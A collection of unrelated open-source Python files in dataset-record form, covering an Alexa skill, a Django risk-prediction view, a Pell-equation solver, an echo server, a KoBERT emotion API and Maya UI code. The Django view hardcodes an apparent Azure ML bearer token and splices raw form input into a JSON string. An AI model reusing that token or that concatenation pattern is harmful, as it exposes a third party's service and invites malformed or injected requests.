0\n session['suggestion']['type'] = ''\n session['suggestion']['value'] = ''\n handler_input.attributes_manager.session_attributes = session\n return ProjectHandler(handler_input, \"\")\n else:\n return __FallbackIntentHandler(handler_input, \"I did not ask a yes or no question. Anyway, \")\n \n@sb.request_handler(can_handle_func = is_intent_name(\"AMAZON.NoIntent\"))\ndef NoHandler(handler_input):\n session = get_session(handler_input)\n if session['expecting']['projectSearch']:\n session['expecting']['projectSearch'] = False\n return handler_input.response_builder.speak(\"Okay, call me again if you need me. Goodbye.\").response\n elif session['expecting']['suggestion']:\n session['expecting']['suggestion'] = False\n if session['suggestion']['count'] >= 2:\n return handler_input.response_builder.speak(\"Okay, call me again if you need me. Goodbye.\").response\n else:\n return __GetSuggestionHandler(handler_input)\n else:\n return __FallbackIntentHandler(handler_input, \"I did not ask a yes or no question. Anyway, \")\n\n@sb.request_handler(can_handle_func = is_request_type(\"SessionEndedRequest\"))\ndef SessionEndedRequestHandler(handler_input):\n \"\"\"Handler for Session End.\"\"\"\n # type: (HandlerInput) -> Response\n logger.info(\"In SessionEndedRequestHandler\")\n\n logger.info(\"Session ended reason: {}\".format(\n handler_input.request_envelope.request.reason))\n return handler_input.response_builder.response\n\n\n# Exception Handler\n@sb.exception_handler(can_handle_func = lambda i, e: True)\ndef CatchAllExceptionHandler(handler_input, exception):\n \"\"\"Catch all exception handler, log exception and\n respond with custom message.\n \"\"\"\n # type: (HandlerInput, Exception) -> Response\n logger.info(\"In CatchAllExceptionHandler\")\n logger.error(exception, exc_info=True)\n\n handler_input.response_builder.speak(EXCEPTION_MESSAGE)\n\n return handler_input.response_builder.speak(f\"{exception}\").response\n\n@sb.global_response_interceptor()\ndef ResponseLogger(handler_input, response):\n \"\"\"Log the alexa responses.\"\"\"\n logger.debug(\"Alexa Response: {}\".format(response))\n\n@sb.global_request_interceptor()\ndef request_interceptor(handler_input):\n if is_request_type(\"IntentRequest\")(handler_input):\n sessionManager.set_session(handler_input)\n session = get_session(handler_input)\n if not (is_intent_name(\"AMAZON.YesIntent\")(handler_input) or is_intent_name(\"AMAZON.NoIntent\")(handler_input) or is_intent_name(\"AMAZON.StopIntent\")(handler_input) or is_intent_name(\"AMAZON.CancelIntent\")(handler_input)):\n if session['expecting']['projectSearch']:\n session['expecting']['projectSearch'] = False\n if session['expecting']['suggestion']:\n session['expecting']['suggestion'] = False\n if not (is_intent_name(\"AMAZON.YesIntent\")(handler_input) or is_intent_name(\"GetSuggestionIntent\")(handler_input) or is_intent_name(\"AutoSuggestionIntent\")(handler_input)):\n session['suggestion']['count'] = 0\n session['suggestion']['type'] = ''\n session['suggestion']['value'] = ''\n logger.info(\"Request received: {}\".format(handler_input.request_envelope.request))\n\n# Handler name that is used on AWS lambda\nlambda_handler = sb.lambda_handler()\n# sb.add_request_handler(ConfirmSuggestionHandler())","repo_name":"ravern/showcase","sub_path":"voice-interface/src/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":22666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44196184290","text":"from django.conf import settings\nfrom django_mako_plus import view_function, jscontext\nfrom datetime import datetime, timezone\nfrom homepage import models as hmod\nfrom django.contrib.auth.models import User\nfrom django.db.models import Avg\nimport requests\nfrom django import forms\nimport json\nfrom decimal import Decimal\n\n@view_function\ndef process_request(request):\n\n if request.method == 'POST':\n form = PrescriberForm(request.POST)\n if form.is_valid():\n\n gender = form.cleaned_data.get('Gender')\n state = form.cleaned_data.get('State')\n credentials = form.cleaned_data.get('Credentials')\n specialty = form.cleaned_data.get('Specialty')\n totalPrescriptions = form.cleaned_data.get('TotalPrescriptions')\n\n\n url = \"https://ussouthcentral.services.azureml.net/workspaces/1280ec3736a7452db2ad1b4ffdf4fee8/services/904fb1ad86594947a63dd8ad9047933e/execute\"\n\n querystring = {\"api-version\":\"2.0\",\"details\":\"true\"}\n\n payload = \"{\\r\\n \\\"Inputs\\\": {\\r\\n \\\"Web input\\\": {\\r\\n \\\"ColumnNames\\\": [\\r\\n \\\"Gender\\\",\\r\\n \\\"State\\\",\\r\\n \\\"Credentials\\\",\\r\\n \\\"Specialty\\\",\\r\\n \\\"TotalPrescriptions\\\"\\r\\n ],\\r\\n \\\"Values\\\": [\\r\\n [\\r\\n \\\"\" + gender + \"\\\",\\r\\n \\\"\" + state + \"\\\",\\r\\n \\\"\" + credentials + \"\\\",\\r\\n \\\"\" + specialty + \"\\\",\\r\\n \\\"\"+ totalPrescriptions +\"\\\"\\r\\n ]\\r\\n ]\\r\\n }\\r\\n }\"\n headers = {\n 'Authorization': \"bearer o74oVphPyeiQPFgMzwpkm0k6AtgIqjWZQg1L9+myTJTgcLf+6WXSga7FRw+9myIYtwcvUZMlgqyn92MclBy4oA==\",\n 'Content-Type': \"application/json\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"27290ef0-98ba-41d6-8a4f-2389a1417b8f\"\n }\n\n response = requests.request(\"POST\", url, data=payload, headers=headers, params=querystring)\n\n start = str(response.text).find('Values\":[[\"0')\n s = str(response.text)[start:] \n end = str(response.text).find(']]')\n values = str(response.text)[start + 11 : end - 1]\n values = values.replace(\"\\\"\", \"\")\n valueList = values.split(',')\n \n chance = valueList[1]\n chance = Decimal(chance) * 100\n chance = round(chance, 2)\n\n atRisk = valueList[2]\n if atRisk == '0':\n atRisk = 'No'\n else:\n atRisk = 'Yes'\n else: \n chance = \"\"\n atRisk = \"\"\n \n else:\n form = PrescriberForm() \n chance = \"\"\n atRisk = \"\"\n\n context = {\n 'form': form,\n 'chance': chance,\n 'atRisk': atRisk,\n }\n\n return request.dmp.render('amIHighRisk.html', context)\n\n\nclass PrescriberForm(forms.Form):\n Gender = forms.CharField(label='Gender (M/F)', max_length=100)\n State = forms.CharField(label='State (ex. UT)', max_length=100)\n Credentials = forms.CharField(label='Credentials', max_length=100)\n Specialty = forms.CharField(label='Specialty', max_length=100)\n TotalPrescriptions = forms.CharField(label='Total Prescriptions', max_length=100)\n\n \n def clean(self):\n if self.cleaned_data.get('Gender') != 'M' and self.cleaned_data.get('Gender') != 'F': \n raise forms.ValidationError(\"Please enter gender as M or F\")\n\n if len(self.cleaned_data.get('State')) > 3: \n raise forms.ValidationError(\"Please enter a state abbreviation\")\n\n if int(self.cleaned_data.get('TotalPrescriptions')) < 0: \n raise forms.ValidationError(\"Please enter a valid number of Total Prescriptions\")\n\n return self.cleaned_data","repo_name":"mcmtrnt/intex2","sub_path":"homepage/views/amIHighRisk.py","file_name":"amIHighRisk.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19313439414","text":"from PIL import Image\nimport os\n\ndirnames = ['./train', './test']\n\nfor dirname in dirnames:\n print(\"check \" + dirname)\n filenames = os.listdir(dirname)\n for index, name in enumerate(filenames):\n filename = os.path.join(dirname, name)\n img = Image.open(filename)\n t = img.format.lower()\n if t != 'jpeg' and t != 'jpg' and t != 'png' and t != 'bmp':\n print(\"type error: \" + filename + \", \" + str(t))\n\n if len(img.size) != 2:\n print(\"shape error: \" + filename + \", \" + str(img.size))\n","repo_name":"xuzhezhaozhao/ai","sub_path":"datasets/leg-dataset/check_type.py","file_name":"check_type.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"73182909542","text":"# -*- coding: utf-8 -*-\n'''\nConsider quadratic Diophantine equations of the form:\n\nx^2 – Dy^2 = 1\n\nFor example, when D=13, the minimal solution in x is 649^2 – 13×180^2 = 1.\n\nIt can be assumed that there are no solutions in positive integers when D is square.\n\nBy finding minimal solutions in x for D = {2, 3, 5, 6, 7}, we obtain the following:\n\n32 – 2×2^2 = 1\n22 – 3×1^2 = 1\n92 – 5×4^2 = 1\n52 – 6×2^2 = 1\n82 – 7×3^2 = 1\n\nHence, by considering minimal solutions in x for D ≤ 7, the largest x is obtained when D=5.\n\nFind the value of D ≤ 1000 in minimal solutions of x for which the largest value of x is obtained.\n\nhttp://mathworld.wolfram.com/PellEquation.html\nhttps://en.wikipedia.org/wiki/Pell%27s_equation\nhttps://en.wikipedia.org/wiki/Methods_of_computing_square_roots#Pell.27s_equation\n\n'''\nimport math\nimport sys\n\ndef isPerfectSquare(n):\n\tnsqrt = math.sqrt(n)\n\treturn nsqrt == math.floor(nsqrt)\n\ndef converg(n):\n\t#0\n\taz = math.floor(math.sqrt(n))\n\tp = az\n\tp2 = p\n\tq = 1\n\tq2 = q\n\tk = 0 # P\n\tl = 1 # Q\n\n\t#print(\"%s^2 - %s*%s^2 = %s\" % (p,n,q,p**2-n*q**2))\n\n\t#1\n\tk = az\n\tl = n - az**2\n\ta = math.floor( (az + k ) / l)\n\tp = az*a + 1\n\tq = a\n\n\twhile p*p - n*q*q != 1:\n\n\t\t#print(\"%s^2 - %s*%s^2 = %s\" % (p,n,q,p**2-n*q**2))\n\t\tptmp = p\n\t\tqtmp = q\n\n\t\t# start\n\t\tk = int(a * l - k)\n\t\tl = int((n - k*k) / l)\n\n\t\ta = int(math.floor( (az + k ) / l))\n\t\ttry:\n\t\t\tp = int(a*p+p2)\n\t\t\tq = int(a*q+q2)\n\t\texcept:\n\t\t\t#print(\"DID NOT WORK...\", p,q)\n\t\t\tbreak\n\n\n\t\t# ...\n\t\tp2 = ptmp\n\t\tq2 = qtmp\n\n\treturn p,q\n\nxlargest = 0\niindex = 0\nfor i in range(2, 1001):\n\tif isPerfectSquare(i):\n\t\tcontinue\n\tx,y = converg(i)\n\t#print(i, x, y)\n\tif x > xlargest:\n\t\tprint(\"NEW RECORD\", i, x)\n\t\txlargest = x\n\t\tiindex = i\n\nprint(iindex, xlargest)\n\n","repo_name":"elitan/euler","sub_path":"066/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"59761842","text":"from pathlib import Path\n\nfrom fleet.configs import drive_config as cfg\nfrom fleet.configs.drive_config import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass Configure:\n\n def __init__(self):\n\n self.environment_name = None\n\n def build_parser(self, parser):\n\n subparsers = parser.add_subparsers(title='Environment configuration',\n dest='op',\n description='Valid Environment config'\n ' operation', help='Select a '\n 'command to run')\n\n # data-catalogue env {get, set}\n # where {get, set} is required\n\n subparsers.required = True\n\n set = subparsers.add_parser('set', help='Set environment info')\n get = subparsers.add_parser('get', help='Get environment info')\n\n set.set_defaults(main=self.set_environ)\n get.set_defaults(main=self.get_environ)\n\n set.add_argument(help='Environment configuration', dest='env',\n choices=['default', 'develop', 'staging', 'testing'])\n\n def set_environ(self, args):\n\n self.environment_name = args.env\n\n assert self.environment_name in cfg.AWS_PROFILE_NAMES\n profile_name = cfg.AWS_PROFILE_NAMES[self.environment_name]\n credentials_file = cfg.AWS_CREDENTIALS_FILE\n credentials_file = Path(credentials_file)\n\n if credentials_file.is_file():\n credentials_file.unlink()\n\n credentials_file.parent.mkdir(parents=True, exist_ok=True)\n\n with credentials_file.open('w') as fp:\n fp.write('{}\\n'.format(self.environment_name))\n fp.write('{}\\n'.format(profile_name))\n\n logger.info('{} environment setup'.format(self.environment_name))\n\n def get_environ(self, args):\n\n if not Path(cfg.AWS_CREDENTIALS_FILE).is_file():\n logger.warning('Environment not setup')\n return\n\n with open(cfg.AWS_CREDENTIALS_FILE) as pfile:\n creds = pfile.readlines()\n\n assert len(creds) == 2, \"Credentials file incorrect\"\n env_name, profile_name = [c.strip() for c in creds]\n\n logger.info('Environment name : {}'.format(env_name))\n logger.info('Profile name : {}'.format(profile_name))\n","repo_name":"moabitcoin/data-catalogue","sub_path":"fleet/s3_ops/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35260609533","text":"import textwrap\n\nfrom pynodegl_utils.misc import SceneCfg, scene\nfrom pynodegl_utils.tests.cmp_fingerprint import test_fingerprint\nfrom pynodegl_utils.toolbox.colors import COLORS\nfrom pynodegl_utils.toolbox.shapes import equilateral_triangle_coords\n\nimport pynodegl as ngl\n\n\n@test_fingerprint(width=320, height=320, nb_keyframes=20, tolerance=1)\n@scene()\ndef velocity_triangle_rotate(cfg: SceneCfg):\n cfg.duration = 5.0\n cfg.aspect_ratio = (1, 1)\n\n anim_kf = [\n ngl.AnimKeyFrameFloat(0, 0),\n ngl.AnimKeyFrameFloat(cfg.duration, 360 * 3, \"circular_in_out\"),\n ]\n anim = ngl.AnimatedFloat(anim_kf)\n velocity = ngl.VelocityFloat(anim)\n\n frag = textwrap.dedent(\n \"\"\"\\\n void main()\n {\n float v = clamp(velocity / 3000., 0.0, 1.0);\n ngl_out_color = vec4(v, v / 2.0, 0.0, 1.0);\n }\n \"\"\"\n )\n\n p0, p1, p2 = equilateral_triangle_coords(2.0)\n triangle = ngl.RenderColor(COLORS.white, geometry=ngl.Triangle(p0, p1, p2))\n triangle = ngl.Rotate(triangle, angle=anim)\n\n prog_c = ngl.Program(vertex=cfg.get_vert(\"color\"), fragment=frag)\n circle = ngl.Render(ngl.Circle(radius=1.0, npoints=128), prog_c)\n circle.update_frag_resources(velocity=velocity)\n return ngl.Group(children=(circle, triangle))\n\n\n@test_fingerprint(width=320, height=320, nb_keyframes=20, tolerance=1)\n@scene()\ndef velocity_circle_distort_2d(cfg: SceneCfg):\n cfg.duration = 4.0\n cfg.aspect_ratio = (1, 1)\n\n coords = list(equilateral_triangle_coords())\n coords.append(coords[0])\n\n pos_kf = [ngl.AnimKeyFrameVec2(cfg.duration * i / 3.0, pos[0:2], \"exp_in_out\") for i, pos in enumerate(coords)]\n anim = ngl.AnimatedVec2(pos_kf)\n velocity = ngl.VelocityVec2(anim)\n\n vert = textwrap.dedent(\n \"\"\"\\\n void main()\n {\n float distort_max = 0.1;\n float velocity_l = length(velocity);\n float direction_l = length(ngl_position);\n vec2 normed_velocity = velocity_l == 0.0 ? vec2(0.0) : -velocity / velocity_l;\n vec2 normed_direction = direction_l == 0.0 ? vec2(0.0) : ngl_position.xy / direction_l;\n float distort = clamp(dot(normed_velocity, normed_direction) / 2.0 * distort_max, 0.0, 1.0);\n vec4 pos = vec4(ngl_position, 1.0) + vec4(translate, 0.0, 0.0) + vec4(-distort * velocity, 0.0, 0.0);\n ngl_out_pos = ngl_projection_matrix * ngl_modelview_matrix * pos;\n }\n \"\"\"\n )\n\n geom = ngl.Circle(radius=0.2, npoints=128)\n prog = ngl.Program(vertex=vert, fragment=cfg.get_frag(\"color\"))\n shape = ngl.Render(geom, prog)\n shape.update_frag_resources(color=ngl.UniformVec3(COLORS.white), opacity=ngl.UniformFloat(1))\n shape.update_vert_resources(velocity=velocity, translate=anim)\n return shape\n\n\n@test_fingerprint(width=320, height=320, nb_keyframes=20, tolerance=1)\n@scene()\ndef velocity_circle_distort_3d(cfg: SceneCfg):\n cfg.duration = 4.0\n cfg.aspect_ratio = (1, 1)\n\n coords = list(equilateral_triangle_coords())\n coords.append(coords[0])\n pos_kf = [ngl.AnimKeyFrameVec3(cfg.duration * i / 3.0, pos, \"exp_in_out\") for i, pos in enumerate(coords)]\n anim = ngl.AnimatedVec3(pos_kf)\n velocity = ngl.VelocityVec3(anim)\n\n vert = textwrap.dedent(\n \"\"\"\\\n void main()\n {\n float distort_max = 0.1;\n float velocity_l = length(velocity);\n float direction_l = length(ngl_position);\n vec3 normed_velocity = velocity_l == 0.0 ? vec3(0.0) : -velocity / velocity_l;\n vec3 normed_direction = direction_l == 0.0 ? vec3(0.0) : ngl_position / direction_l;\n float distort = clamp(dot(normed_velocity, normed_direction) / 2.0 * distort_max, 0.0, 1.0);\n vec4 pos = vec4(ngl_position, 1.0) + vec4(-distort * velocity, 0.0);\n ngl_out_pos = ngl_projection_matrix * ngl_modelview_matrix * pos;\n }\n \"\"\"\n )\n\n geom = ngl.Circle(radius=0.2, npoints=128)\n prog = ngl.Program(vertex=vert, fragment=cfg.get_frag(\"color\"))\n shape = ngl.Render(geom, prog)\n shape.update_frag_resources(color=ngl.UniformVec3(COLORS.white), opacity=ngl.UniformFloat(1))\n shape.update_vert_resources(velocity=velocity)\n return ngl.Translate(shape, vector=anim)\n","repo_name":"gopro/gopro-lib-node.gl","sub_path":"tests/velocity.py","file_name":"velocity.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"35"} +{"seq_id":"73642558180","text":"import socket\n\ndef send_msg(sock, msg):\n totalsl = 0\n totalml = len(msg)\n while totalsl < totalml:\n sl = sock.send(msg[totalsl:])\n if sl == 0:\n raise RuntimeError('socket connection broken')\n totalsl += sl\n\ndef recv_msg(sock, cl=1024):\n while True:\n rc = sock.recv(cl)\n if len(rc) == 0:\n break\n yield rc\n\ndef main(ip, port):\n\n ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,True)\n ss.bind((ip, port))\n ss.listen()\n print('starting server ...')\n cs, (ca, cp) = ss.accept()\n print(f'accepted from {ca}:{cp}')\n for rm in recv_msg(cs):\n send_msg(cs, rm)\n print(f'echo: {rm}')\n cs.close()\n ss.close()\n\nif __name__ == '__main__':\n ip, port = input().split(':')\n main(ip, int(port))\n","repo_name":"itc-n23026/SocketProgramming","sub_path":"server/echoserver.py","file_name":"echoserver.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8503284480","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nimport gluonnlp as nlp\nimport numpy as np\nimport kss\nfrom tqdm import tqdm, tqdm_notebook\nfrom kobert.utils import get_tokenizer\nfrom kobert.pytorch_kobert import get_pytorch_kobert_model\nfrom transformers import AdamW\nfrom transformers.optimization import get_cosine_schedule_with_warmup\nfrom bert_model import BERTClassifier\nfrom bertDataSet import BERTDataset\n\n\nfrom typing import Optional\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\napp = FastAPI()\n\n\nclass Item(BaseModel):\n writing: str\n\n\n@app.get('/')\ndef read_root():\n return{\"Hello\": \"World\"}\n\n\n@app.post('/emotion')\ndef emotion_extraction(item: Item):\n max_len = 64\n batch_size = 64\n warmup_ratio = 0.1\n num_epochs = 20\n max_grad_norm = 1\n log_interval = 200\n learning_rate = 5e-5\n device = torch.device('cpu')\n bertmodel, vocab = get_pytorch_kobert_model()\n # 토큰화\n tokenizer = get_tokenizer()\n tok = nlp.data.BERTSPTokenizer(tokenizer, vocab, lower=False)\n\n model = BERTClassifier(bertmodel, dr_rate=0.5).to(device)\n # Prepare optimizer and schedule (linear warmup and decay)\n no_decay = ['bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not any(\n nd in n for nd in no_decay)], 'weight_decay': 0.01},\n {'params': [p for n, p in model.named_parameters() if any(\n nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n\n optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n # 전체 모델을 통째로 불러옴, 클래스 선언 필수\n # model = torch.load('../../model/3emotions_model2.pt', map_location=device)\n # state_dict를 불러 온 후, 모델에 저장\n model.load_state_dict(torch.load(\n '../mlptkey/3emotions_model_state_dict2.pt', map_location=device))\n\n checkpoint = torch.load('../mlptkey/3emotions_all2.tar',\n map_location=device) # dict 불러오기\n model.load_state_dict(checkpoint['model'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n\n # dataset_another = [['영화에 나오는 귀신이 너무 무섭네요', '0'], ['그게 사실이야? 대박', '0'], ['배고파서 화가 난다', '0'],\n # ['그런 일이 있었다니 참 안타깝다', '0'], ['오늘은 비가 온다고 해요~', '0'], ['대학교에 붙어서 기분이 너무 좋다', '0'], ['수준 너무 떨어진다~', '0']]\n\n total = []\n item = str(item)\n for sent in kss.split_sentences(item): # 글에서 문장 하나씩 가져오기\n sentence = []\n sentence.append(sent)\n sentence.append('0')\n total.append(sentence)\n\n another_test = BERTDataset(\n total, 0, 1, tok, max_len, True, False)\n test_dataloader = torch.utils.data.DataLoader(\n another_test, batch_size=batch_size, num_workers=5)\n\n model.eval()\n result = -1\n for batch_id, (token_ids, valid_length, segment_ids, label) in enumerate(tqdm_notebook(test_dataloader)):\n token_ids = token_ids.long().to(device)\n segment_ids = segment_ids.long().to(device)\n\n valid_length = valid_length\n label = label.long().to(device)\n\n out = model(token_ids, valid_length, segment_ids)\n\n test_eval = []\n for i in out:\n logits = i\n logits = logits.detach().cpu().numpy()\n test_eval.append(np.argmax(logits))\n\n print(test_eval)\n print(max(test_eval, key=test_eval.count))\n result = int(max(test_eval, key=test_eval.count))\n\n return result\n","repo_name":"hoonbro/Greeder","sub_path":"emotion/emotion_extraction/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74077292899","text":"# !/usr/bin/python\n# coding=utf-8\nimport os\n\ntry:\n import pymel.core as pm\nexcept ImportError as error:\n print(__file__, error)\nimport pythontk as ptk\nimport mayatk as mtk\nfrom uitk import Signals\nfrom tentacle.slots.maya import SlotsMaya\n\n\nclass File(SlotsMaya):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def cmb001_init(self, widget):\n \"\"\" \"\"\"\n widget.refresh = True\n\n widget.add(\n mtk.get_recent_projects(slice(0, 20), format=\"timestamp|standard\"),\n header=\"Recent Projects:\",\n clear=True,\n )\n\n def cmb001(self, index, widget):\n \"\"\"Recent Projects\"\"\"\n if index > 0:\n project = widget.items[index]\n pm.workspace.open(project)\n widget.setCurrentIndex(0)\n self.sb.file.cmb006.init_slot()\n\n def cmb002_init(self, widget):\n \"\"\" \"\"\"\n # Get the current autosave state\n autoSaveState = pm.autoSave(q=True, enable=True)\n autoSaveInterval = pm.autoSave(q=True, int=True)\n autoSaveAmount = pm.autoSave(q=True, maxBackups=True)\n # open directory\n widget.menu.add(\n \"QPushButton\",\n setObjectName=\"b000\",\n setText=\"Open Directory\",\n setToolTip=\"Open the autosave directory.\",\n )\n # delete all\n widget.menu.add(\n \"QPushButton\",\n setObjectName=\"b002\",\n setText=\"Delete All\",\n setToolTip=\"Delete all autosave files.\",\n )\n # toggle autosave\n widget.menu.add(\n \"QCheckBox\",\n setText=\"Autosave\",\n setObjectName=\"chk006\",\n setChecked=autoSaveState,\n setToolTip=\"Set the autosave state as active or disabled.\",\n )\n # autosave amount\n widget.menu.add(\n \"QSpinBox\",\n setPrefix=\"Amount: \",\n setObjectName=\"s000\",\n set_limits=[1, 100],\n setValue=autoSaveAmount,\n set_height=20,\n setToolTip=\"The number of autosave files to retain.\",\n )\n # autosave interval\n widget.menu.add(\n \"QSpinBox\",\n setPrefix=\"Interval: \",\n setObjectName=\"s001\",\n set_limits=[1, 60],\n setValue=autoSaveInterval / 60,\n set_height=20,\n setToolTip=\"The autosave interval in minutes.\",\n )\n widget.menu.chk006.toggled.connect(\n lambda s: pm.autoSave(enable=s, limitBackups=True)\n )\n widget.menu.s000.valueChanged.connect(\n lambda v: pm.autoSave(maxBackups=v, limitBackups=True)\n )\n widget.menu.s001.valueChanged.connect(\n lambda v: pm.autoSave(int=v * 60, limitBackups=True)\n )\n widget.add(\n mtk.get_recent_autosave(format=\"timestamp|standard\"),\n header=\"Recent Autosave\",\n clear=True,\n )\n\n def cmb002(self, index, widget):\n \"\"\"Recent Autosave\"\"\"\n if index > 0:\n file = widget.items[index]\n pm.openFile(file, open=1, force=True)\n widget.setCurrentIndex(0)\n\n def cmb003_init(self, widget):\n \"\"\" \"\"\"\n widget.add(\n [\n \"Import file\",\n \"Import Options\",\n \"FBX Import Presets\",\n \"Obj Import Presets\",\n ],\n header=\"Import\",\n )\n\n def cmb003(self, index, widget):\n \"\"\"Import\"\"\"\n if index > 0: # hide then perform operation\n self.sb.parent().hide(force=1)\n if index == 1: # Import\n pm.mel.Import()\n elif index == 2: # Import options\n pm.mel.ImportOptions()\n elif index == 3: # FBX Import Presets\n pm.mel.FBXUICallBack(-1, \"editImportPresetInNewWindow\", \"fbx\")\n elif index == 4: # Obj Import Presets\n pm.mel.FBXUICallBack(-1, \"editImportPresetInNewWindow\", \"obj\")\n widget.setCurrentIndex(0)\n\n def cmb004_init(self, widget):\n \"\"\" \"\"\"\n items = [\n \"Export Selection\",\n \"Send to Unreal\",\n \"Send to Unity\",\n \"GoZ\",\n \"Send to 3dsMax: As New Scene\",\n \"Send to 3dsMax: Update Current\",\n \"Send to 3dsMax: Add to Current\",\n \"Export to Offline File\",\n \"Export Options\",\n \"FBX Export Presets\",\n \"Obj Export Presets\",\n ]\n widget.add(items, header=\"Export\")\n\n def cmb004(self, index, widget):\n \"\"\"Export\"\"\"\n if index > 0: # hide then perform operation\n self.sb.parent().hide(force=1)\n if index == 1: # Export selection\n pm.mel.ExportSelection()\n elif index == 2: # Unreal\n pm.mel.SendToUnrealSelection()\n elif index == 3: # Unity\n pm.mel.SendToUnitySelection()\n elif index == 4: # GoZ\n pm.mel.eval(\n 'print(\"GoZ\"); source\"C:/Users/Public/Pixologic/GoZApps/Maya/GoZBrushFromMaya.mel\"; source \"C:/Users/Public/Pixologic/GoZApps/Maya/GoZScript.mel\";'\n )\n elif index == 5: # Send to 3dsMax: As New Scene\n pm.mel.SendAsNewScene3dsMax() # OneClickMenuExecute (\"3ds Max\", \"SendAsNewScene\"); doMaxFlow { \"sendNew\",\"perspShape\",\"1\" };\n elif index == 6: # Send to 3dsMax: Update Current\n pm.mel.UpdateCurrentScene3dsMax() # OneClickMenuExecute (\"3ds Max\", \"UpdateCurrentScene\"); doMaxFlow { \"update\",\"perspShape\",\"1\" };\n elif index == 7: # Send to 3dsMax: Add to Current\n pm.mel.AddToCurrentScene3dsMax() # OneClickMenuExecute (\"3ds Max\", \"AddToScene\"); doMaxFlow { \"add\",\"perspShape\",\"1\" };\n elif index == 8: # Export to Offline File\n pm.mel.ExportOfflineFileOptions() # ExportOfflineFile\n elif index == 9: # Export options\n pm.mel.ExportSelectionOptions()\n elif index == 10: # FBX Export Presets\n pm.mel.FBXUICallBack(-1, \"editExportPresetInNewWindow\", \"fbx\")\n elif index == 11: # Obj Export Presets\n pm.mel.FBXUICallBack(-1, \"editExportPresetInNewWindow\", \"obj\")\n widget.setCurrentIndex(0)\n\n def cmb005_init(self, widget):\n \"\"\" \"\"\"\n widget.menu.add(\n \"QPushButton\",\n setObjectName=\"b001\",\n setText=\"Last\",\n setToolTip=\"Open the most recent file.\",\n )\n widget.add(\n mtk.get_recent_files(slice(0, 20), format=\"timestamp|standard\"),\n header=\"Recent Files\",\n clear=True,\n )\n\n def cmb005(self, index, widget):\n \"\"\"Recent Files\"\"\"\n if index > 0:\n force = True\n # if sceneName prompt user to save; else force open\n force if str(pm.mel.file(q=True, sceneName=1, shortName=1)) else not force\n print(widget.items[index])\n pm.openFile(widget.items[index], open=1, force=force)\n widget.setCurrentIndex(0)\n\n def cmb006_init(self, widget):\n \"\"\" \"\"\"\n widget.refresh = True\n if not widget.is_initialized:\n widget.menu.add(\n self.sb.Label,\n setObjectName=\"lbl000\",\n setText=\"Set\",\n setToolTip=\"Set the project directory.\",\n )\n widget.menu.add(\n self.sb.Label,\n setObjectName=\"lbl004\",\n setText=\"Root\",\n setToolTip=\"Open the project directory.\",\n )\n\n workspace = mtk.get_maya_info(\"workspace_dir\")\n project = ptk.format_path(workspace, \"dir\")\n # Add each dir in the workspace as well as its full path as data\n items = {d: f\"{workspace}/{d}\" for d in os.listdir(workspace)}\n widget.add(items, header=project, clear=True)\n\n def cmb006(self, index, widget):\n \"\"\"Workspace\"\"\"\n if index > 0:\n try:\n item = widget.items[index]\n os.startfile(item)\n except Exception as e:\n print(e)\n widget.setCurrentIndex(0)\n\n def list000_init(self, widget):\n \"\"\" \"\"\"\n widget.position = \"top\"\n widget.sublist_y_offset = 18\n widget.fixed_item_height = 18\n recentFiles = mtk.get_recent_files(slice(0, 11))\n w1 = widget.add(\"Recent Files\")\n truncated = ptk.truncate(recentFiles, 65)\n w1.sublist.add(zip(truncated, recentFiles))\n widget.setVisible(bool(recentFiles))\n\n @Signals(\"on_item_interacted\")\n def list000(self, item):\n \"\"\" \"\"\"\n data = item.item_data()\n pm.openFile(data, open=True, force=True)\n\n def lbl000(self):\n \"\"\"Set Workspace\"\"\"\n pm.mel.SetProject()\n # refresh project items to reflect new workspace.\n self.sb.file.cmb006.init_slot()\n\n def lbl004(self):\n \"\"\"Open current project root\"\"\"\n dir_ = pm.workspace(q=True, rd=1) # current project path.\n os.startfile(ptk.format_path(dir_))\n\n def b000(self):\n \"\"\"Autosave: Open Directory\"\"\"\n # dir1 = str(pm.workspace(q=True, rd=1))+'autosave' #current project path.\n # get autosave dir path from env variable.\n dir2 = os.environ.get(\"MAYA_AUTOSAVE_FOLDER\").split(\";\")[0]\n\n try:\n # os.startfile(self.format_path(dir1))\n os.startfile(ptk.format_path(dir2))\n\n except FileNotFoundError:\n self.sb.message_box(\"The system cannot find the file specified.\")\n\n def b001(self):\n \"\"\"Open Reference Manager\"\"\"\n module = mtk.core_utils.reference_manager\n slot_class = module.ReferenceManagerSlots\n\n self.sb.register(\"reference_manager.ui\", slot_class, base_dir=module)\n self.sb.parent().set_ui(\"reference_manager\")\n\n def b002(self):\n 